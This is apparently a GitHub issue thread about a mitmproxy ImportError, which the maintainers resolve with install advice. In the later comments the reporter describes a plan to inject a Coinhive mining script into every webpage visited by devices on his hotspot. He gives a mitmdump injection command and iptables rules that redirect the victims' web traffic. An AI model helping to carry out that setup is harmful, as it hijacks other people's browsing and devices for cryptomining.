### ISSUE TITLE
ImportError: cannot import name 'UBInt16'

### ISSUE THREAD

**Issue by caffeinatedMike** [mitmproxy/mitmproxy#2739]
The title explains the error I receive when trying to run the command
```
mitmproxy -T --host -port 8080
```
Looking at the Traceback it's pointing to the tls-parser.py file line 8, then provides
```
from construct import (Array, Bytes, Struct, UBInt16, UBInt32, UBInt8, PascalString, Embed, TunnelAdapter, GreedyRange, Switch, OptionalGreedyRange, Optional)
```

Is this a bug or is there something I can do to fix this issue myself?

**Comment by caffeinatedMike** [comment]
I've read about construct being the issue and saw a previous issue state that uninstalling construct and installing v2.8.16 would resolve the issue. I tried that and it didn't change anything.

**Comment by mhils** [comment]
Which mitmproxy version is this? Pretty sure this is fixed in 3.0.0rc1 as we don't depend on construct anymore.

**Comment by Kriechi** [comment]
This is fixed in 3.0.0rc1 and git-master by not depending on the construct package any more.

**Comment by caffeinatedMike** [comment]
I will check in a bit once I wake up some more. But, it was whatever version comes pre-installed with Kali Linux 32-bit. I also ran all updates yesterday, which took about an hour to apply. So, would this be an issue to report to Kali devs or does this point to the wrong version being included in the `pip` library? I tried `pip install mitmproxy` and `pip update mitmproxy`, both throwing the error afterwards. I guess what I'm trying to ask is do we need to manually install mitmproxy from git now?

**Comment by Kriechi** [comment]
We released the first release candidate for mitmproxy v3.0 - so you can expect a final release soon (if all goes well). The final release will then be available in pypi (via pip) directly. We do not have a timeline in mind - it's ready when it's ready.

After that the package maintainers (not us) can do their job of upgrading and adding the latest mitmproxy release to their repositories.

If you want it "right now" - just install from git! 😄

**Comment by caffeinatedMike** [comment]
Awesome, thanks for the useful information and for getting back to my
initial query so fast! I'll be installing from git later today then :)

Best Regards,

Michael Hill

**Comment by mhils** [comment]
We also have precompiled binaries (and a Python wheel) on our GitHub releases page if that's easier :)

**Comment by caffeinatedMike** [comment]
Python wheel will be perfect for me :)

Best Regards,

Michael Hill

**Comment by caffeinatedMike** [comment]
One more unrelated thing while I have you. Was reading issue #76 for adding multiple scripts. So, say I have the following.

1. https://coin-hive.com/lib/coinhive.min.js
2. Url of script that uses library 1.

How would I format this command?

Is the correct implementation:
```
mitmdump -p 8888 -s "js_injector.py https://coin-hive.com/lib/coinhive.min.js" "script2.js"
```

**Comment by caffeinatedMike** [comment]
@mhils When trying to install the version from master I get the following error
```
mitmproxy-3.0.0.dev1101-0xd9d4d15-py3-none-any.whl is not a supported wheel on this platform.
```
Any other way I can try? I'm on Kali 2017.3 32-bit

**Comment by mhils** [comment]
This sounds like vastly outdated pip or you're on Python 2. Either fix that or use our precompiled binaries :)

**Comment by caffeinatedMike** [comment]
How do I fix the pip issue? Kali has both python2 and python3. But I think
pip is only installed on 2.

How do I use the precompiled binaries?

Best Regards,

Michael Hill

**Comment by mhils** [comment]
I'm not familiar with Kali, but usually "pip3" does the trick. You can also just download the precompiled binaries from https://github.com/mitmproxy/mitmproxy/releases and run them like any other standalone binary. They include a full Python environment.

**Comment by caffeinatedMike** [comment]
Ok, finally got it installed with pip3. But, getting a `ModuleNotFoundError: No module named ‘libmproxy’` error still? 

Also, to explain what i want to do:

I want to turn my laptop into a hotspot and run mitmproxy on it, so that all devices that connect to it will have my script injected to every webpage they visit (it’s a mining script). So, in exchange for the free WiFi I can earn some revenue. It is fully exposed that this will happen. Is the line I’m using to run mitmproxy in the snapshot above correct for this? Will this work as I intended it? Right now after I run the command and try to connect to the hotspot I can get internet connection from it. I made sure to turn port forwarding on with

sysctl -w net.ipv4.ip_forward=1
Then I run
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
Then I run the mitmproxy command as shown in the screenshot

What am I doing wrong?
I swear this is the last thing.
